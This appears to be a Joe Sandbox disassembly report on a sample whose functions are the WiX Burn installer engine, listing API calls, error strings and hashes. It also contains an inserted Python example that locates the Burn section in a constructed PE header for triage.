                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                              • API String ID: 760788290-2956246334
                                                                                                                                                              • Opcode ID: bdca272faf8ed17b2eed0a43e6877c509fc5c05cbf6045c93fc1ff29f085da7e
                                                                                                                                                              • Instruction ID: 1627fa5c421a8a80199b89867b868db9ea709da89b78a04f1e20c40c7442471d
                                                                                                                                                              • Opcode Fuzzy Hash: bdca272faf8ed17b2eed0a43e6877c509fc5c05cbf6045c93fc1ff29f085da7e
                                                                                                                                                              • Instruction Fuzzy Hash: A5E1E032E4466EBECF31A6A4DD42FBEB6A4BB01711F110671FD11B69D1DBB09D0496C0

                                                                                                                                                              Control-flow Graph (graph image and raw node/edge data not reproduced)
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B502
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B550
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B556
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00A04461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B59E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B5A4
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B601
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B607
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B650
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B656
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B6C7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B6CD
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B716
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B71C
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B765
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B76B
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B7B7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B7BD
                                                                                                                                                                • Part of subcall function 00A0394F: GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
                                                                                                                                                                • Part of subcall function 00A0394F: RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B810
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B872
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B8FC
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B906
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                              • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                              • API String ID: 3411815225-695169583
                                                                                                                                                              • Opcode ID: 600d5d5a3c26bdfdea1c62f84e6b0bde83fdbfdf95c4981ddc7b49ea2d7e3663
                                                                                                                                                              • Instruction ID: 2c250cc2c7c60830b7a25955e9590b91a9f0809c5acf9985bc81fb5acc500761
                                                                                                                                                              • Opcode Fuzzy Hash: 600d5d5a3c26bdfdea1c62f84e6b0bde83fdbfdf95c4981ddc7b49ea2d7e3663
                                                                                                                                                              • Instruction Fuzzy Hash: 7112F67AA51239BBDB30CB559E46FAA76B8BB85B10F0141A5FD04BB2C0D7719D408BF0
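The strings attached to this function (section.cpp, ".wix" and "burn", "Failed to find Burn section.", "PE Header from file didn't match PE Header in memory.") are the error messages of the WiX Burn bootstrapper engine's section parser, and the ReadFile calls with a length of 0x28 match sizeof(IMAGE_SECTION_HEADER). The routine reads its own executable, walks the DOS and NT headers, looks for the Burn metadata section and checks that the headers on disk match the image in memory. The following Python is an added example written for this report, not code from Joe Sandbox or from WiX; it reproduces those steps on a constructed minimal PE image so an analyst can triage whether a sample carries a Burn section. It assumes the section name is ".wixburn" (the two 4-byte halves ".wix" and "burn" shown above), and the sample image is constructed inline, not taken from w3245.exe.

```python
"""Locate the WiX Burn metadata section in a PE image (added example)."""
import struct
from typing import Dict, Optional

IMAGE_DOS_SIGNATURE = 0x5A4D     # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550  # "PE\0\0"
NT_HEADER_PREFIX = 0x18          # signature (4) + IMAGE_FILE_HEADER (20)
SECTION_HEADER_SIZE = 0x28       # sizeof(IMAGE_SECTION_HEADER), the 0x28 seen in the ReadFile trace
BURN_SECTION_NAME = b".wixburn"  # assumption: WiX's section name, shown above as ".wix" + "burn"


class PeError(ValueError):
    """Raised for the header failures the section.cpp strings describe."""


def find_burn_section(data: bytes) -> Optional[Dict[str, int]]:
    """Walk DOS header -> NT header -> section table; return the Burn section or None."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise PeError("Failed to find valid DOS image header in buffer.")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + NT_HEADER_PREFIX > len(data) or \
            struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise PeError("Failed to find valid NT image header in buffer.")
    # IMAGE_FILE_HEADER directly follows the 4-byte "PE\0\0" signature.
    _machine, num_sections, _ts, _symtab, _nsyms, size_opt, _chars = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sect_off = e_lfanew + NT_HEADER_PREFIX + size_opt  # seek past optional header
    for i in range(num_sections):
        off = sect_off + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(data):
            raise PeError(f"Failed to read image section header, index: {i}")
        name, _vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        if name == BURN_SECTION_NAME:
            return {"index": i, "virtual_address": vaddr,
                    "raw_size": rawsize, "raw_pointer": rawptr}
    return None


def headers_match(file_image: bytes, memory_image: bytes) -> bool:
    """Byte-compare the NT headers on disk with those of the mapped image."""
    e_lfanew = struct.unpack_from("<I", file_image, 0x3C)[0]
    size_opt = struct.unpack_from("<H", file_image, e_lfanew + 0x14)[0]
    end = e_lfanew + NT_HEADER_PREFIX + size_opt
    return file_image[e_lfanew:end] == memory_image[e_lfanew:end]


def classify(data: bytes) -> str:
    """Triage verdict: 'burn-bundle', 'pe-no-burn' or 'not-pe'."""
    try:
        return "burn-bundle" if find_burn_section(data) else "pe-no-burn"
    except PeError:
        return "not-pe"


def build_sample_pe(with_burn: bool) -> bytes:
    """Constructed minimal PE32 header blob (sample input, not a real binary)."""
    e_lfanew = 0x80
    dos = struct.pack("<H", IMAGE_DOS_SIGNATURE) + b"\0" * (0x3C - 2)
    dos = (dos + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    size_opt = 0xE0  # PE32 optional header size
    sections = [(b".text", 0x1000, 0x1000, 0x200, 0x400)]
    if with_burn:
        sections.append((BURN_SECTION_NAME, 0x34, 0x2000, 0x200, 0x600))
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B).ljust(size_opt, b"\0")
    table = b"".join(struct.pack("<8sIIII", n, vs, va, rs, rp) + b"\0" * 16
                     for n, vs, va, rs, rp in sections)
    return dos + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + opt_hdr + table


if __name__ == "__main__":
    print(classify(build_sample_pe(True)), find_burn_section(build_sample_pe(True)))
    print(classify(build_sample_pe(False)), classify(b"\0" * 128))
```

Run against a real file, `find_burn_section(open(path, "rb").read())` gives the raw offset where the Burn header lives; a sample that carries the section but whose in-memory headers differ from the file's would trip the same mismatch check the strings above describe.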

Control-flow Graph
• (rendered graph not recoverable from the page) Function 00A20D16: basic blocks call SetEvent, WaitForSingleObject, ResetEvent, CreateFileW, SetFilePointerEx and SetEndOfFile; every API failure path reads GetLastError and then calls 00A03821 before returning through 00A40237.
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,00A208BC,?,?), ref: 00A20D25
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20D2F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00A208BC,?,?), ref: 00A20D74
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20D7F
                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,?,00A208BC,?,?), ref: 00A20DB7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 1865021742-2104912459
                                                                                                                                                              • Opcode ID: ccb076c57e92374508950f2b4141bb38c78333c8a0a44589837f1cb84f9ac107
                                                                                                                                                              • Instruction ID: e8ab94973d349c858cef6f18012f148b4b3f855cf289e789d1e04728fdf9c321
                                                                                                                                                              • Opcode Fuzzy Hash: ccb076c57e92374508950f2b4141bb38c78333c8a0a44589837f1cb84f9ac107
                                                                                                                                                              • Instruction Fuzzy Hash: 6091183BA85632B7D73057ED6E09F6A7954BF21B21F124731BE10BA6C1D761DC0082E1

Control-flow Graph
• (rendered graph not recoverable from the page) Function 00A05195: calls GetModuleHandleW, CoInitializeEx, GetVersionExW (with GetLastError on failure) and CoUninitialize; after initialisation it branches to one of the run-mode handlers (00A04C86, 00A04A88, 00A048EF, 00A04AE5, 00A04D39) and failure paths pass through 00A03821 and 00A40237.
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A05217
                                                                                                                                                                • Part of subcall function 00A404F8: InitializeCriticalSection.KERNEL32(00A6B5FC,?,00A05223,00000000,?,?,?,?,?,?), ref: 00A4050F
                                                                                                                                                                • Part of subcall function 00A0120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00A0523F,00000000,?), ref: 00A01248
                                                                                                                                                                • Part of subcall function 00A0120A: GetLastError.KERNEL32(?,?,?,00A0523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00A01252
                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00A05285
                                                                                                                                                                • Part of subcall function 00A40E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00A40E28
                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00A05317
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A05321
                                                                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A0558E
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to initialize COM., xrefs: 00A05291
                                                                                                                                                              • 3.11.1.2318, xrefs: 00A05384
                                                                                                                                                              • engine.cpp, xrefs: 00A05345
                                                                                                                                                              • Failed to get OS info., xrefs: 00A0534F
                                                                                                                                                              • Failed to run per-machine mode., xrefs: 00A0546C
                                                                                                                                                              • Failed to run untrusted mode., xrefs: 00A054B6
                                                                                                                                                              • Failed to initialize core., xrefs: 00A053C3
                                                                                                                                                              • Failed to run embedded mode., xrefs: 00A05444
                                                                                                                                                              • Failed to initialize Cryputil., xrefs: 00A052A6
                                                                                                                                                              • Failed to initialize Regutil., xrefs: 00A052C9
                                                                                                                                                              • Invalid run mode., xrefs: 00A053F9
                                                                                                                                                              • Failed to initialize XML util., xrefs: 00A052F9
                                                                                                                                                              • Failed to run RunOnce mode., xrefs: 00A0541C
                                                                                                                                                              • Failed to run per-user mode., xrefs: 00A05494
                                                                                                                                                              • Failed to initialize Wiutil., xrefs: 00A052E1
                                                                                                                                                              • Failed to initialize engine state., xrefs: 00A0526C
                                                                                                                                                              • Failed to parse command line., xrefs: 00A05245
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                              • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                              • API String ID: 3262001429-510904028
                                                                                                                                                              • Opcode ID: 34f1065a5a733920edd0c00a26c3fa28a026efd8221de6f652ae1f8f9bf158c7
                                                                                                                                                              • Instruction ID: f77c64e80a2e4191b68fff62b0a234b218c7e6d8d644c4ff1ecf4d838aa6f801
                                                                                                                                                              • Opcode Fuzzy Hash: 34f1065a5a733920edd0c00a26c3fa28a026efd8221de6f652ae1f8f9bf158c7
                                                                                                                                                              • Instruction Fuzzy Hash: 8DB1A476D4062DABDB319B74ED46BEE76B5BF48310F0401A5F908A6281DB71DE80CF91

Control-flow Graph
• (rendered graph not recoverable from the page) Function 00A1752A: calls GetCurrentProcess once; the remaining blocks are internal calls (00A0762C, 00A0C407, 00A0C26E, 00A0C4C8, 00A2C001, 00A15C33, 00A0827B, 00A0821F, 00A1A50C, 00A0D5A0, 00A0CBC5, 00A0C8E6) with each failure branch exiting through 00A40237.
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set source process path variable., xrefs: 00A17709
                                                                                                                                                              • Failed to set source process folder variable., xrefs: 00A17745
                                                                                                                                                              • WixBundleSourceProcessFolder, xrefs: 00A17734
                                                                                                                                                              • Failed to open attached UX container., xrefs: 00A1758E
                                                                                                                                                              • Failed to open manifest stream., xrefs: 00A175AB
                                                                                                                                                              • WixBundleElevated, xrefs: 00A176A5, 00A176B6
                                                                                                                                                              • Failed to get manifest stream from container., xrefs: 00A175CC
                                                                                                                                                              • Failed to overwrite the %ls built-in variable., xrefs: 00A176BB
                                                                                                                                                              • Failed to extract bootstrapper application payloads., xrefs: 00A177EF
                                                                                                                                                              • Failed to initialize internal cache functionality., xrefs: 00A1779F
                                                                                                                                                              • Failed to load catalog files., xrefs: 00A1780F
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 00A17759
                                                                                                                                                              • Failed to initialize variables., xrefs: 00A17571
                                                                                                                                                              • Failed to set original source variable., xrefs: 00A1776A
                                                                                                                                                              • WixBundleUILevel, xrefs: 00A176D6, 00A176E7
                                                                                                                                                              • Failed to get source process folder from path., xrefs: 00A17725
                                                                                                                                                              • WixBundleSourceProcessPath, xrefs: 00A176F8
                                                                                                                                                              • Failed to load manifest., xrefs: 00A175E8
                                                                                                                                                              • Failed to get unique temporary folder for bootstrapper application., xrefs: 00A177CE
                                                                                                                                                              • Failed to parse command line., xrefs: 00A17667
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                              • API String ID: 32694325-1564579409
                                                                                                                                                              • Opcode ID: 5a87a5e2661f31c79016c2ce5905e894e18973cd20ddf7fef010f892829e83eb
                                                                                                                                                              • Instruction ID: c063115c546f90d4d87223edbaba368bd0d0c9fc2b614387fdfc4d27711d7488
                                                                                                                                                              • Opcode Fuzzy Hash: 5a87a5e2661f31c79016c2ce5905e894e18973cd20ddf7fef010f892829e83eb
                                                                                                                                                              • Instruction Fuzzy Hash: 2EA19572E4461ABBDB129BA4CD85EEEB77CBB04710F001666F915E7181D770E984CBE0

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Control-flow graph of the function at 00A0762C (rendered graph; the node/edge list is not reproduced here). Windows API visible on the graph: InitializeCriticalSection; the remaining nodes are calls into internal functions 00A05623, 00A40237 and 00A2E06F.
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00A1756B,00A053BD,00000000,00A05445), ref: 00A0764C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                              • API String ID: 32694325-3635313340
                                                                                                                                                              • Opcode ID: 9e5bd21b61f03ae87ffc39476ae8b8bf5ebd6f0ab8def05e8efdad58efbd319d
                                                                                                                                                              • Instruction ID: 997925e1d9b40d7d552c83208688f3ad4a49a8b2f18a1aa60741d3423e52062b
                                                                                                                                                              • Opcode Fuzzy Hash: 9e5bd21b61f03ae87ffc39476ae8b8bf5ebd6f0ab8def05e8efdad58efbd319d
                                                                                                                                                              • Instruction Fuzzy Hash: 30325CB4C126299FDBA5CF5AD9887CDFAB4BB49314F5081EED20CA6250C7B01B88CF45

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Control-flow graph of the function at 00A182BA (rendered graph; the node/edge list is not reproduced here). Windows APIs visible on the graph: GetCurrentProcess, GetWindowsDirectoryW, GetTempPathW, GetLastError, UuidCreate and StringFromGUID2.
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00A05489), ref: 00A18310
                                                                                                                                                                • Part of subcall function 00A40879: OpenProcessToken.ADVAPI32(?,00000008,?,00A053BD,00000000,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A40897
                                                                                                                                                                • Part of subcall function 00A40879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408A1
                                                                                                                                                                • Part of subcall function 00A40879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A4092B
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00A18336
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A18340
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00A183BD
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A183C7
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 00A18406
                                                                                                                                                              Strings
                                                                                                                                                              • cache.cpp, xrefs: 00A18364, 00A183EB, 00A1843C
                                                                                                                                                              • Failed to get temp path for working folder., xrefs: 00A183F5
                                                                                                                                                              • Failed to concat Temp directory on windows path for working folder., xrefs: 00A183AD
                                                                                                                                                              • Failed to copy working folder path., xrefs: 00A1848B
                                                                                                                                                              • Failed to append bundle id on to temp path for working folder., xrefs: 00A18470
                                                                                                                                                              • Failed to get windows path for working folder., xrefs: 00A1836E
                                                                                                                                                              • Failed to ensure windows path for working folder ended in backslash., xrefs: 00A1838B
                                                                                                                                                              • Temp\, xrefs: 00A18395
                                                                                                                                                              • %ls%ls\, xrefs: 00A18458
                                                                                                                                                              • Failed to create working folder guid., xrefs: 00A18413
                                                                                                                                                              • Failed to convert working folder guid into string., xrefs: 00A18446
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                              • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                              • API String ID: 266130487-819636856
                                                                                                                                                              • Opcode ID: 8ab2a6a5ac980a4c6aff989e4ea4900c3170276ba539148f65fb4b27a9f295b6
                                                                                                                                                              • Instruction ID: 19d7b431df87e9fd3d5096b5f7df2bb600e720619314b7fdd6b25707cd81f9a4
                                                                                                                                                              • Opcode Fuzzy Hash: 8ab2a6a5ac980a4c6aff989e4ea4900c3170276ba539148f65fb4b27a9f295b6
                                                                                                                                                              • Instruction Fuzzy Hash: 0B41C236E41629B7DB20D6E49D0AFDA7368BB54B11F108561BE04FB180EE78DD4886E1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Control-flow graph of the function at 00A210FB (rendered graph; the node/edge list is not reproduced here). Windows APIs visible on the graph: CoInitializeEx, SetEvent, WaitForSingleObject, ResetEvent, GetLastError and CoUninitialize.
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 00A2111D
                                                                                                                                                              • CoUninitialize.COMBASE ref: 00A21398
                                                                                                                                                              Memory Dump Source
